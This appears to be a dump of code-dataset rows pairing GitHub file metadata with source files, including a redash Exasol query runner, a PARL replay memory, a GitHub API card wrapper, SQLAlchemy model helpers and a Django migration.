blob_id stringlengths 40 40 | directory_id stringlengths 40 40 | path stringlengths 3 288 | content_id stringlengths 40 40 | detected_licenses listlengths 0 112 | license_type stringclasses 2 values | repo_name stringlengths 5 115 | snapshot_id stringlengths 40 40 | revision_id stringlengths 40 40 | branch_name stringclasses 684 values | visit_date timestamp[us]date 2015-08-06 10:31:46 2023-09-06 10:44:38 | revision_date timestamp[us]date 1970-01-01 02:38:32 2037-05-03 13:00:00 | committer_date timestamp[us]date 1970-01-01 02:38:32 2023-09-06 01:08:06 | github_id int64 4.92k 681M ⌀ | star_events_count int64 0 209k | fork_events_count int64 0 110k | gha_license_id stringclasses 22 values | gha_event_created_at timestamp[us]date 2012-06-04 01:52:49 2023-09-14 21:59:50 ⌀ | gha_created_at timestamp[us]date 2008-05-22 07:58:19 2023-08-21 12:35:19 ⌀ | gha_language stringclasses 147 values | src_encoding stringclasses 25 values | language stringclasses 1 value | is_vendor bool 2 classes | is_generated bool 2 classes | length_bytes int64 128 12.7k | extension stringclasses 142 values | content stringlengths 128 8.19k | authors listlengths 1 1 | author_id stringlengths 1 132 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
f742b40048d600de11e340648eb9e41f0de18b24 | adde5784379cba18934bc32bd779959ccc8bc94f | /redash/query_runner/exasol.py | 790fb7d7475c18e969c6cb22d50a6751c0be4eae | [
"BSD-2-Clause"
] | permissive | YuanlvCold/mxzz-bi | 32292a8cafb4097fcb60e70917849a2f23e5511f | 7cae1b80e2f715d0af7ca912d1793668353c4b9e | refs/heads/master | 2022-12-02T04:39:06.631341 | 2020-08-17T06:46:19 | 2020-08-17T06:46:19 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,668 | py | import datetime
from redash.query_runner import *
from redash.utils import json_dumps
def _exasol_type_mapper(val, data_type):
if val is None:
return None
elif data_type["type"] == "DECIMAL":
if data_type["scale"] == 0 and data_type["precision"] < 16:
return int(val)
elif data_type["scale"] == 0 and data_type["precision"] >= 16:
return val
else:
return float(val)
elif data_type["type"] == "DATE":
return datetime.date(int(val[0:4]), int(val[5:7]), int(val[8:10]))
elif data_type["type"] == "TIMESTAMP":
return datetime.datetime(
int(val[0:4]),
int(val[5:7]),
int(val[8:10]), # year, month, day
int(val[11:13]),
int(val[14:16]),
int(val[17:19]), # hour, minute, second
int(val[20:26].ljust(6, "0")) if len(val) > 20 else 0,
) # microseconds (if available)
else:
return val
def _type_mapper(data_type):
    """Map Exasol column metadata onto the redash TYPE_* constants."""
    type_name = data_type["type"]
    if type_name == "DECIMAL":
        # Integral decimals map to int unless they are too wide for a
        # lossless native integer, in which case they travel as strings.
        if data_type["scale"] == 0:
            return TYPE_INTEGER if data_type["precision"] < 16 else TYPE_STRING
        return TYPE_FLOAT
    if type_name == "DATE":
        return TYPE_DATE
    if type_name == "TIMESTAMP":
        return TYPE_DATETIME
    return TYPE_STRING
# The query runner is only usable when the optional pyexasol driver is
# installed; Exasol.enabled() reports this flag back to redash.
try:
    import pyexasol
    enabled = True
except ImportError:
    enabled = False
class Exasol(BaseQueryRunner):
    """redash query runner for the Exasol analytics database (via pyexasol)."""

    # Cheap statement redash uses to test connectivity.
    noop_query = "SELECT 1 FROM DUAL"
    @classmethod
    def configuration_schema(cls):
        """Return the JSON schema describing the data-source settings form."""
        return {
            "type": "object",
            "properties": {
                "user": {"type": "string"},
                "password": {"type": "string"},
                "host": {"type": "string"},
                "port": {"type": "number", "default": 8563},
                "encrypted": {"type": "boolean", "title": "Enable SSL Encryption"},
            },
            "required": ["host", "port", "user", "password"],
            "order": ["host", "port", "user", "password", "encrypted"],
            "secret": ["password"],
        }
    def _get_connection(self):
        """Open a new pyexasol connection from the stored configuration."""
        exahost = "%s:%s" % (
            self.configuration.get("host", None),
            self.configuration.get("port", 8563),
        )
        return pyexasol.connect(
            dsn=exahost,
            user=self.configuration.get("user", None),
            password=self.configuration.get("password", None),
            # Encryption defaults to on when the option was never saved.
            encryption=self.configuration.get("encrypted", True),
            compression=True,
            json_lib="rapidjson",
            # Convert wire values (dates, decimals, ...) while fetching.
            fetch_mapper=_exasol_type_mapper,
        )
    def run_query(self, query, user):
        """Execute ``query`` and return ``(json_data, error)``.

        Driver exceptions propagate to the caller (there is no except
        clause); the statement and connection are always closed.
        """
        connection = self._get_connection()
        statement = None
        error = None
        try:
            statement = connection.execute(query)
            columns = [
                {"name": n, "friendly_name": n, "type": _type_mapper(t)}
                for (n, t) in statement.columns().items()
            ]
            cnames = statement.column_names()
            # Each row becomes a {column_name: value} dict for redash.
            rows = [dict(zip(cnames, row)) for row in statement]
            data = {"columns": columns, "rows": rows}
            json_data = json_dumps(data)
        finally:
            if statement is not None:
                statement.close()
            connection.close()
        return json_data, error
    def get_schema(self, get_stats=False):
        """Return the schema (tables and their columns) for autocomplete."""
        query = """
        SELECT
            COLUMN_SCHEMA,
            COLUMN_TABLE,
            COLUMN_NAME
        FROM EXA_ALL_COLUMNS
        """
        connection = self._get_connection()
        statement = None
        try:
            statement = connection.execute(query)
            result = {}
            # Group columns under "schema.table" keys.
            for (schema, table_name, column) in statement:
                table_name_with_schema = "%s.%s" % (schema, table_name)
                if table_name_with_schema not in result:
                    result[table_name_with_schema] = {
                        "name": table_name_with_schema,
                        "columns": [],
                    }
                result[table_name_with_schema]["columns"].append(column)
        finally:
            if statement is not None:
                statement.close()
            connection.close()
        return result.values()
    @classmethod
    def enabled(cls):
        """Report whether the optional pyexasol dependency is importable."""
        return enabled
register(Exasol)
| [
"2426548297@qq.com"
] | 2426548297@qq.com |
9f9ad3e97589ce06abe60f4f50a7a25348e188fb | 0f0a0d5672bf40438d68ad523f484da0760407e8 | /Intro to Tensorflow/regression.py | 09dcf16265433ca238162899742a45f9e63ad631 | [
"MIT"
] | permissive | ITSJKS/100-Days-of-ML-Code | 45b3c4873df7e8684308003b8cc860a08000e11b | 677d8d6a19ae63d3aa2ddd74e9ce8ae7a06b71df | refs/heads/master | 2023-04-14T06:22:04.196837 | 2019-01-21T07:58:59 | 2019-01-21T07:58:59 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,016 | py | # -*- coding: utf-8 -*-
"""
Created on Sat Sep 22 19:01:05 2018
Tensorflow implementation of the iris dataset classification
@author: Vishal
"""
#Using a linear classifier
import tensorflow.contrib.learn as tf
from sklearn import datasets, metrics
iris = datasets.load_iris()
clf = tf.TensorFlowLinearClassifier(n_classes=3)
clf.fit(iris.data, iris.target)
acc = metrics.accuracy_score(iris.target, clf.predict(iris.data))
print(f'{acc}')
#Using a linear regressor
import tensorflow.contrib.learn as tf
from sklearn import datasets, metrics, preprocessing, cross_validation
iris = datasets.load_iris()
scaler = preprocessing.MinMaxScaler()
features = scaler.fit_transform(iris.data)
labels = iris.target
features_train, features_test, labels_train, labels_test = cross_validation.train_test_split(features, labels, test_size=0.3, random_state=42)
clf = tf.TensorFlowLinearRegressor()
clf.fit(features_train, labels_train)
accuracy = metrics.accuracy_score(labels_test, clf.predict(features_test))
print(f'{acc}') | [
"vishal114186@gmail.com"
] | vishal114186@gmail.com |
218de8abbc9bfd77742d7ab9ac813686655e4ae3 | 46d2a73deb63f81554c478822459a41f09d8519c | /github/objects/projectcard.py | 4b94450c49a4edf517c719c3e31c973f8a74e7dd | [
"Apache-2.0"
] | permissive | ByteMeDirk/github.py | ad036aef661adc4d9a06239f52b79acd5230c430 | 14b14f857fb85c35b5d14ba073afc36e339199b9 | refs/heads/master | 2023-08-10T17:40:52.783117 | 2020-08-13T23:54:55 | 2020-08-13T23:54:55 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,230 | py | """
/github/objects/projectcard.py
Copyright (c) 2019-2020 ShineyDev
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from github import utils
from github.abc import Node
from github.abc import Type
from github.abc import UniformResourceLocatable
from github.enums import ProjectCardState
class ProjectCard(Node, Type, UniformResourceLocatable):
    """
    Represents a card in a GitHub project.
    Implements:
    * :class:`~github.abc.Node`
    * :class:`~github.abc.Type`
    * :class:`~github.abc.UniformResourceLocatable`
    """
    # https://docs.github.com/en/graphql/reference/objects#projectcard
    __slots__ = ("data", "http")
    def __init__(self, data, http):
        # ``data`` is the raw GraphQL node payload; ``http`` is the
        # shared HTTP client used for mutations.
        self.data = data
        self.http = http
    @property
    def body(self):
        """
        The body of the card.
        :type: Optional[:class:`str`]
        """
        # GraphQL exposes the body under the "note" field.
        return self.data["note"]
    @property
    def created_at(self):
        """
        When the card was created.
        :type: :class:`~datetime.datetime`
        """
        created_at = self.data["createdAt"]
        return utils.iso_to_datetime(created_at)
    @property
    def database_id(self):
        """
        The card's database ID.
        :type: :class:`int`
        """
        return self.data["databaseId"]
    @property
    def is_archived(self):
        """
        Whether the card is archived.
        :type: :class:`bool`
        """
        return self.data["isArchived"]
    @property
    def state(self):
        """
        The card's state.
        :type: :class:`~github.enums.ProjectCardState`
        """
        state = self.data["state"]
        return ProjectCardState.try_value(state)
    @property
    def updated_at(self):
        """
        When the card was last updated.
        :type: :class:`~datetime.datetime`
        """
        updated_at = self.data["updatedAt"]
        return utils.iso_to_datetime(updated_at)
    async def move_to(self, column, *, after=None):
        """
        |coro|
        Moves the card to a column.
        Parameters
        ----------
        column: :class:`~github.ProjectColumn`
            The column to move the card to.
        after: :class:`~github.ProjectCard`
            The card to place the card after. Pass ``None`` to place it
            at the top. Defaults to ``None``.
        Raises
        ------
        ~github.errors.Forbidden
            You do not have permission to move the card.
        """
        # https://docs.github.com/en/graphql/reference/mutations#moveprojectcard
        # The mutation wants the *id* of the preceding card, or None.
        if after is not None:
            after = after.id
        await self.http.mutate_projectcard_move_to(self.id, column.id, after)
| [
"contact@shiney.dev"
] | contact@shiney.dev |
43876ba54601bc0d0ee260b3f6b6a8ad88551d0d | 730430ba3b45d5728ef044863598199bfa33aaaa | /examples/Baselines/Halite_competition/torch/rl_trainer/replay_memory.py | b4c790801b49cecbdfda042bfbf8dbcc81e1227a | [
"Apache-2.0"
] | permissive | PaddlePaddle/PARL | 062d1b4a5335553be6cdfc33ad12f07ebbcd7310 | 3bb5fe36d245f4d69bae0710dc1dc9d1a172f64d | refs/heads/develop | 2023-08-09T02:12:39.741551 | 2023-05-19T17:52:25 | 2023-05-19T17:52:25 | 131,044,128 | 3,818 | 988 | Apache-2.0 | 2023-07-28T03:59:20 | 2018-04-25T17:54:22 | Python | UTF-8 | Python | false | false | 3,684 | py | # Copyright (c) 2018 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import numpy as np
class ReplayMemory(object):
    """ Replay Memory for saving data.
    Args:
        max_size (int): size of replay memory
        obs_dim (int): dimension of the observation
    """
    def __init__(self, max_size, obs_dim):
        self.max_size = int(max_size)
        self.obs_dim = obs_dim
        self.reset()
    def sample_batch(self, batch_size):
        """Sample ``batch_size`` random transitions (with replacement).

        When the memory holds fewer than ``batch_size`` entries, every
        stored entry is returned instead. Note ``returns`` is reshaped
        to a column vector here, unlike sample_batch_by_index.
        """
        if batch_size > self._curr_size:
            batch_idx = np.arange(self._curr_size)
        else:
            batch_idx = np.random.randint(self._curr_size, size=batch_size)
        obs = self.obs[batch_idx]
        action = self.action[batch_idx]
        value = self.value[batch_idx]
        returns = self.returns[batch_idx].reshape((-1, 1))
        log_prob = self.log_prob[batch_idx]
        adv = self.adv[batch_idx]
        return obs, action, value, returns, log_prob, adv
    def make_index(self, batch_size):
        """Draw ``batch_size`` random indices into the stored data."""
        batch_idx = np.random.randint(self._curr_size, size=batch_size)
        return batch_idx
    def sample_batch_by_index(self, batch_idx):
        """Fetch the transitions at the given indices (no reshaping)."""
        obs = self.obs[batch_idx]
        action = self.action[batch_idx]
        value = self.value[batch_idx]
        returns = self.returns[batch_idx]
        log_prob = self.log_prob[batch_idx]
        adv = self.adv[batch_idx]
        return obs, action, value, returns, log_prob, adv
    def append(self, obs, act, value, returns, log_prob, adv):
        """Append a batch of transitions, overwriting oldest data on overflow.

        When the write head would run past the end of the buffer, all
        arrays are rotated left (np.roll with a negative shift) so the
        incoming batch can be written contiguously at the tail.
        """
        size = len(obs)
        self._curr_size = min(self._curr_size + size, self.max_size)
        if self._curr_pos + size >= self.max_size:
            # Negative shift: rotate existing entries towards the front.
            delta_size = -(size + self._curr_pos - self.max_size)
            self.obs = np.roll(self.obs, delta_size, 0)
            self.action = np.roll(self.action, delta_size)
            self.value = np.roll(self.value, delta_size)
            self.returns = np.roll(self.returns, delta_size)
            self.log_prob = np.roll(self.log_prob, delta_size)
            self.adv = np.roll(self.adv, delta_size)
            self._curr_pos += delta_size
        self.obs[self._curr_pos:self._curr_pos + size] = obs
        self.action[self._curr_pos:self._curr_pos + size] = act
        self.value[self._curr_pos:self._curr_pos + size] = value
        self.returns[self._curr_pos:self._curr_pos + size] = returns
        self.log_prob[self._curr_pos:self._curr_pos + size] = log_prob
        self.adv[self._curr_pos:self._curr_pos + size] = adv
        self._curr_pos = (self._curr_pos + size) % self.max_size
    def size(self):
        """Number of transitions currently stored."""
        return self._curr_size
    def __len__(self):
        return self._curr_size
    def reset(self):
        """Clear the memory and reallocate all storage arrays."""
        self.obs = np.zeros((self.max_size, self.obs_dim), dtype='float32')
        self.action = np.zeros((self.max_size, ), dtype='int32')
        self.value = np.zeros((self.max_size, ), dtype='float32')
        self.returns = np.zeros((self.max_size, ), dtype='float32')
        self.log_prob = np.zeros((self.max_size, ), dtype='float32')
        self.adv = np.zeros((self.max_size, ), dtype='float32')
        self._curr_size = 0
        self._curr_pos = 0
| [
"noreply@github.com"
] | PaddlePaddle.noreply@github.com |
9825285fd8b02cec04445d56367f20d53ae3c2d7 | 85ac9f05432a2a4299cb43969395fd7865e78267 | /entrega4/src/pruebas/process_redirections_to_turtle.py | 7e480559ab44f750fdf039792dc86192344abdfd | [] | no_license | pablodanielrey/twss | 72d8056c2f3fd2a70d465d3176802dbc019fd022 | b533fa6e0ea86460d8ccb49ec554a6f6e7ab4352 | refs/heads/master | 2023-05-20T03:06:23.078921 | 2021-06-12T23:31:13 | 2021-06-12T23:31:13 | 352,428,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,395 | py | import sys
import json
import requests
import re
def get_content(req):
    """Follow 3xx redirects manually (requesting text/turtle) and return
    the body of the final 200 response, or None for any other status.

    NOTE(review): ``assert`` is stripped under ``python -O`` — raising an
    explicit error when Location is missing would be more robust.
    """
    if (req.status_code >= 300 and req.status_code < 400):
        ''' es una redirección '''
        # It is a redirection: chase the Location header ourselves so each
        # hop also asks for the text/turtle representation.
        url = req.headers['Location']
        assert url != None
        req = requests.get(url, headers={'Accept':'text/turtle'}, allow_redirects=False)
        return get_content(req)
    if req.status_code == 200:
        return req.text
    return None
"""
esto por lo que veo no es necesario
if content and req.status_code != 200:
''' analizo el contenido alternativo '''
alternates = r.headers.get('Alternates',None)
if not alternates:
print(f'No existe representación text/turtle para la url {url}')
return None
url = process_alternates(alternates)
r = requests.get(url, headers={'Accept':'text/turtle'}, allow_redirects=False)
return url
"""
def process_alternates(alternates):
    """Pick the text/turtle variant out of an HTTP ``Alternates`` header.

    Each comma-separated entry looks like ``{"<url>" ... {type <media>}}``.
    Returns the URL of the first entry whose media type mentions
    ``turtle``, or ``None`` when no such variant exists.
    """
    pattern = re.compile('{\"(.*)\".*?{type (.*?)}}')
    for entry in alternates.split(','):
        match = pattern.match(entry.strip())
        if match is None:
            continue
        url, media_type = match.groups()
        if 'turtle' in media_type:
            return url
    return None
if __name__ == '__main__':
    # CLI usage: python process_redirections_to_turtle.py <url>
    # The first request lets requests follow redirects; get_content then
    # re-checks the final status and prints the turtle body (or None).
    url = sys.argv[1]
    r = requests.get(url, headers={'Accept':'text/turtle'}, allow_redirects=True)
    print(get_content(r))
| [
"pablodanielrey@gmail.com"
] | pablodanielrey@gmail.com |
009bd21a3d2025431d689ed24c60ffaf15d6dd35 | 9743d5fd24822f79c156ad112229e25adb9ed6f6 | /xai/brain/wordbase/otherforms/_threesomes.py | 7e62196108961159ab33296a6027c68b9f050abc | [
"MIT"
] | permissive | cash2one/xai | de7adad1758f50dd6786bf0111e71a903f039b64 | e76f12c9f4dcf3ac1c7c08b0cc8844c0b0a104b6 | refs/heads/master | 2021-01-19T12:33:54.964379 | 2017-01-28T02:00:50 | 2017-01-28T02:00:50 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 234 | py |
#calss header
class _THREESOMES():
def __init__(self,):
self.name = "THREESOMES"
self.definitions = threesome
self.parents = []
self.childen = []
self.properties = []
self.jsondata = {}
self.basic = ['threesome']
| [
"xingwang1991@gmail.com"
] | xingwang1991@gmail.com |
bf2f71d4544d180707bbd68d82738833911d9391 | a41742023c5725a3e5cfbf50a54601dbe0416855 | /evafm/database/models.py | 41fcb478214df0029c4445d44854f7a1e9d9ee17 | [] | no_license | UfSoft/EvAFM | 1cccb6651833565ccc2e3d241a2e70040e999291 | 72dca1c40ca6ae90d4228ac0e208c623ed6c5d3b | refs/heads/master | 2020-04-15T04:42:43.690612 | 2011-01-21T23:15:51 | 2011-01-21T23:15:51 | 26,618,999 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,880 | py | # -*- coding: utf-8 -*-
"""
evafm.core.database.models
~~~~~~~~~~~~~~~~~~~~~~~~~~
:copyright: © 2011 UfSoft.org - Pedro Algarvio (pedro@algarvio.me)
:license: BSD, see LICENSE for more details.
"""
import os
import re
import sys
import logging
from os import path
from operator import itemgetter
from datetime import datetime
from types import ModuleType
from uuid import uuid4
import sqlalchemy
from sqlalchemy import and_, or_
from sqlalchemy import orm
from sqlalchemy.orm.exc import UnmappedClassError
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy.engine.url import make_url, URL
from werkzeug.security import generate_password_hash, check_password_hash
from evafm.database.signals import database_setup
log = logging.getLogger(__name__)
#: create a new module for all the database related functions and objects
# A synthetic "evafm.database.db" module is registered so other code can
# simply `from evafm.database import db`; it re-exports every public name
# from sqlalchemy and sqlalchemy.orm (first module wins on collisions).
sys.modules['evafm.database.db'] = db = ModuleType('db')
for module in sqlalchemy, sqlalchemy.orm:
    for key in module.__all__:
        if not hasattr(db, key):
            setattr(db, key, getattr(module, key))
class _DebugQueryTuple(tuple):
statement = property(itemgetter(0))
parameters = property(itemgetter(1))
start_time = property(itemgetter(2))
end_time = property(itemgetter(3))
context = property(itemgetter(4))
@property
def duration(self):
return self.end_time - self.start_time
def __repr__(self):
return '<query statement="%s" parameters=%r duration=%.03f>' % (
self.statement,
self.parameters,
self.duration
)
class _ModelTableNameDescriptor(object):
_camelcase_re = re.compile(r'([A-Z]+)(?=[a-z0-9])')
def __get__(self, obj, type):
tablename = type.__dict__.get('__tablename__')
if not tablename:
def _join(match):
word = match.group()
if len(word) > 1:
return ('_%s_%s' % (word[:-1], word[-1])).lower()
return '_' + word.lower()
tablename = self._camelcase_re.sub(_join, type.__name__).lstrip('_')
setattr(type, '__tablename__', tablename)
return tablename
class Model(object):
    """Baseclass for custom user models."""
    #: the query class used. The :attr:`query` attribute is an instance
    #: of this class. By default a :class:`BaseQuery` is used.
    query_class = orm.Query
    #: an instance of :attr:`query_class`. Can be used to query the
    #: database for instances of this model.
    query = None
    # #: arguments for the mapper
    # __mapper_cls__ = _SignalTrackingMapper
    # Table name is derived lazily from the class name (snake_case) and
    # cached on the subclass by the descriptor.
    __tablename__ = _ModelTableNameDescriptor()
#def get_engine():
# return
#
#def _create_scoped_session(db):
# return orm.scoped_session(partial(_SignallingSession, db))
#
class _QueryProperty(object):
    """Descriptor backing ``Model.query``.

    Binds a Query for the owning model to the active database session.
    The database object is received via the ``database_setup`` signal,
    so the property only works after that signal has fired.
    """
    def __init__(self):
        database_setup.connect(self.__on_database_setup)
    def __on_database_setup(self, sender):
        # ``sender`` is the database facade providing get_session().
        self.db = sender
    def __get__(self, obj, type):
        try:
            mapper = orm.class_mapper(type)
            if mapper:
                return type.query_class(mapper, session=self.db.get_session())
        except UnmappedClassError:
            # Unmapped classes (e.g. abstract bases) expose no query.
            return None
# Re-export the boolean operators on the synthetic db module so callers
# can write db.and_(...) / db.or_(...).
db.and_ = and_
db.or_ = or_
#del and_, or_
# Build the declarative base on top of our Model mixin; every mapped
# subclass then gets a lazily-bound `query` property.
Model = declarative_base(cls=Model, name='Model')
Model.query = _QueryProperty()
metadata = Model.metadata
db.metadata = metadata
class SchemaVersion(Model):
    """SQLAlchemy-Migrate schema version control table."""
    __tablename__ = 'migrate_version'
    # One row per migrate repository tracked against this database.
    repository_id = db.Column(db.String(255), primary_key=True)
    repository_path = db.Column(db.Text)
    version = db.Column(db.Integer)
    def __init__(self, repository_id, repository_path, version):
        self.repository_id = repository_id
        self.repository_path = repository_path
        self.version = version
| [
"ufs@ufsoft.org"
] | ufs@ufsoft.org |
e6099d9bca20c1e703ed995f7d4e83cb35feb56d | 13d222bc3332378d433835914da26ed16b583c8b | /src/pemjh/challenge111/main.py | 55ded9f15d33ecae72908afa7c8d34a24369a64e | [] | no_license | mattjhussey/pemjh | c27a09bab09cd2ade31dc23fffac07374bea9366 | 2ebb0a525d2d1c0ee28e83fdc2638c2bec97ac99 | refs/heads/master | 2023-04-16T03:08:59.390698 | 2023-04-08T10:54:00 | 2023-04-08T10:54:00 | 204,912,926 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,266 | py | """ Challenge111 """
# pylint: disable=missing-docstring
from pemjh.numbers import is_prime
def build_nums(repeated, other):
    """Yield every interleaving of ``repeated`` and ``other``.

    Both input sequences keep their internal relative order; each yielded
    value is a list containing all elements of both. Nothing is yielded
    when both sequences are empty.
    """
    total = len(repeated) + len(other)
    if repeated:
        if total == 1:
            yield [repeated[0]]
        else:
            for tail in build_nums(repeated[1:], other):
                yield [repeated[0]] + tail
    if other:
        if total == 1:
            yield [other[0]]
        else:
            for tail in build_nums(repeated, other[1:]):
                yield [other[0]] + tail
def main():
    """ challenge111

    Project Euler 111: for each digit d, sum every 10-digit prime that
    contains the maximal possible number of repeated d digits, then
    return the total over all ten digits.
    """
    # pylint: disable=invalid-name
    # M[d] = maximal repeat count of digit d among 10-digit primes.
    # NOTE(review): these values look precomputed — confirm against the
    # problem analysis rather than derived here.
    M = [8, 9, 8, 9, 9, 9, 9, 9, 8, 9]
    S = []
    for i in range(10):
        s = 0
        # use M[i] to build up all possible numbers
        # Enumerate every choice of the 10 - M[i] "other" digits (as a
        # zero-padded digit string), excluding digit i itself.
        for m in [list(("%0" + str(10 - M[i]) + "d") % m)
                  for m in range(0, 10**(10 - M[i]))]:
            if not any(int(c) == i for c in m):
                # Interleave the repeated digits with the other digits in
                # every possible order and test each candidate number.
                for num in [int("".join(b))
                            for b in build_nums([str(i)] * M[i], m)]:
                    # Discard numbers with a leading zero (< 10^9).
                    if num >= 10**(9) and is_prime(num):
                        # Check each for primality
                        s += num
        S.append(s)
    return sum(S)
| [
"matthew.hussey@googlemail.com"
] | matthew.hussey@googlemail.com |
deaf64a7afcb6d1a9c81b881eef0fa76f4e156d2 | 1f4239936f18b709e82a965022d5d549238bb620 | /klein/test/util.py | 9755e2b9e215d85c5b5aa3c33130e6e879e8b915 | [
"MIT"
] | permissive | WnP/klein | 2165625dcbacb77bc2789dad6c4379685d634d0b | a07a6742abbd2418f2b42bf951ab11de23885c0f | refs/heads/master | 2020-12-25T21:12:27.192758 | 2014-05-14T22:27:06 | 2014-05-14T22:27:06 | 19,759,744 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,926 | py | import twisted
from twisted.trial.unittest import TestCase
from twisted.python import failure
from twisted.python.versions import Version
# Backport: successResultOf/failureResultOf were added to trial's TestCase
# in Twisted 13.1. For older Twisted versions we shadow the imported
# TestCase with a subclass providing equivalent implementations.
if twisted.version < Version('twisted', 13, 1, 0):
    class TestCase(TestCase):
        def successResultOf(self, deferred):
            """Return the current success result of ``deferred`` or fail."""
            result = []
            # addBoth fires synchronously if the Deferred already has a result.
            deferred.addBoth(result.append)
            if not result:
                self.fail(
                    "Success result expected on %r, found no result instead" % (
                        deferred,))
            elif isinstance(result[0], failure.Failure):
                self.fail(
                    "Success result expected on %r, "
                    "found failure result instead:\n%s" % (
                        deferred, result[0].getTraceback()))
            else:
                return result[0]
        def failureResultOf(self, deferred, *expectedExceptionTypes):
            """Return the current failure of ``deferred`` or fail.

            When ``expectedExceptionTypes`` are given, the failure must
            wrap one of them.
            """
            result = []
            deferred.addBoth(result.append)
            if not result:
                self.fail(
                    "Failure result expected on %r, found no result instead" % (
                        deferred,))
            elif not isinstance(result[0], failure.Failure):
                self.fail(
                    "Failure result expected on %r, "
                    "found success result (%r) instead" % (deferred, result[0]))
            elif (expectedExceptionTypes and
                  not result[0].check(*expectedExceptionTypes)):
                expectedString = " or ".join([
                    '.'.join((t.__module__, t.__name__)) for t in
                    expectedExceptionTypes])
                self.fail(
                    "Failure of type (%s) expected on %r, "
                    "found type %r instead: %s" % (
                        expectedString, deferred, result[0].type,
                        result[0].getTraceback()))
            else:
                return result[0]
| [
"haggardii@gmail.com"
] | haggardii@gmail.com |
b62869b2ea9ec7ee576a4f420b28e4a11c073e56 | 82319ec6aaf462f6823f43946a7f4a0624bffa20 | /Mariana/candies.py | 0cf5f3dbec3776bc67771d2ceb5bca91f91c772a | [
"Apache-2.0"
] | permissive | enterstudio/Mariana | b76a382f5873f9bf83837e9f5190ab6684e14972 | 6b186d93c5fe5521603a389e975595e45e1ea5d2 | refs/heads/master | 2021-04-29T04:30:21.627507 | 2017-11-21T16:30:55 | 2017-11-21T16:30:55 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,294 | py | import sys, time
import Mariana.settings as MSET
MESSAGE_LOG_FILE = None
def friendly(msgSubject, msg, warning=False, flush = True) :
    """Prints a friendly message

    Indents ``msg``, prefixes the subject with WARNING when asked, prints
    to stdout when MSET.VERBOSE is on, and appends a timestamped copy to
    the message log file when MSET.SAVE_MESSAGE_LOG is on.
    NOTE(review): the module-level log file is opened lazily with mode
    "w" (truncating) and is never closed.
    """
    global MESSAGE_LOG_FILE
    m = " " + msg.replace("\n", '\n ')
    if warning :
        subject = "WARNING: " + msgSubject
    else :
        subject = msgSubject
    s = """\n%s:\n%s\n%s\n\n Cheers :),\n\n Mariana\n""" %(subject, "-"*(len(subject) + 1), m)
    if MSET.VERBOSE :
        print s
    if flush :
        sys.stdout.flush()
    if MSET.SAVE_MESSAGE_LOG :
        if not MESSAGE_LOG_FILE :
            MESSAGE_LOG_FILE = open(MSET.SAVE_MESSAGE_LOG_FILE, "w")
        MESSAGE_LOG_FILE.write("\ntimestamp:%s, human time:%s\n%s" % (time.time(), time.ctime(), s))
        if flush :
            MESSAGE_LOG_FILE.flush()
def fatal(msgSubject, msg, toRaise = ValueError, flush = True) :
    """Death is upon us

    Logs a timestamped fatal message (when MSET.SAVE_MESSAGE_LOG is on)
    and then raises ``toRaise``. Unlike friendly(), nothing is printed.
    NOTE(review): ``toRaise.message`` is accessed on the exception *class*
    here — presumably callers pass an exception instance carrying a
    Python 2 ``.message``; with the bare class the interpolated text is
    the attribute descriptor. Confirm against call sites.
    """
    global MESSAGE_LOG_FILE
    m = " " + msg.replace("\n", '\n ')
    subject = msgSubject
    s = """\n%s:\n%s\n%s\n\n %s\nSorry,\n\n Mariana\n""" %(subject, "-"*(len(subject) + 1), m, toRaise.message)
    if MSET.SAVE_MESSAGE_LOG :
        if not MESSAGE_LOG_FILE :
            MESSAGE_LOG_FILE = open(MSET.SAVE_MESSAGE_LOG_FILE, "w")
        MESSAGE_LOG_FILE.write("\ntimestamp:%s, human time:%s\n%s" % (time.time(), time.ctime(), s))
        if flush :
            MESSAGE_LOG_FILE.flush()
raise toRaise | [
"tariq.daouda@umontreal.ca"
] | tariq.daouda@umontreal.ca |
3d176dce7202f238b832138d2285f99c932b6cae | 3d7860f969ee69585b476fb22ff2ee1cff587eab | /src/inventory/migrations/0003_auto_20180123_1811.py | 56cdec16960d437cfa3a33d52bc9d1ce1df42bb9 | [] | no_license | niketanmoon/inventory1 | c8778c89eb641dd35d75589c3ffb8d8c200eec34 | 7cb204c5ee5519c89bced51e55675f9d0f3475b0 | refs/heads/master | 2022-10-19T01:31:37.915746 | 2018-01-24T09:32:25 | 2018-01-24T09:32:25 | 118,739,027 | 0 | 1 | null | 2022-10-11T05:56:48 | 2018-01-24T08:56:48 | Python | UTF-8 | Python | false | false | 707 | py | # Generated by Django 2.0.1 on 2018-01-23 12:41
from django.db import migrations, models
# Auto-generated Django migration: makes the three date fields on the
# Computer model nullable (Acquisitiondate, Purchasedate, Returndate).
class Migration(migrations.Migration):
    dependencies = [
        ('inventory', '0002_auto_20180117_1255'),
    ]
    operations = [
        migrations.AlterField(
            model_name='computer',
            name='Acquisitiondate',
            field=models.DateField(null=True),
        ),
        migrations.AlterField(
            model_name='computer',
            name='Purchasedate',
            field=models.DateField(null=True),
        ),
        migrations.AlterField(
            model_name='computer',
            name='Returndate',
            field=models.DateField(null=True),
        ),
    ]
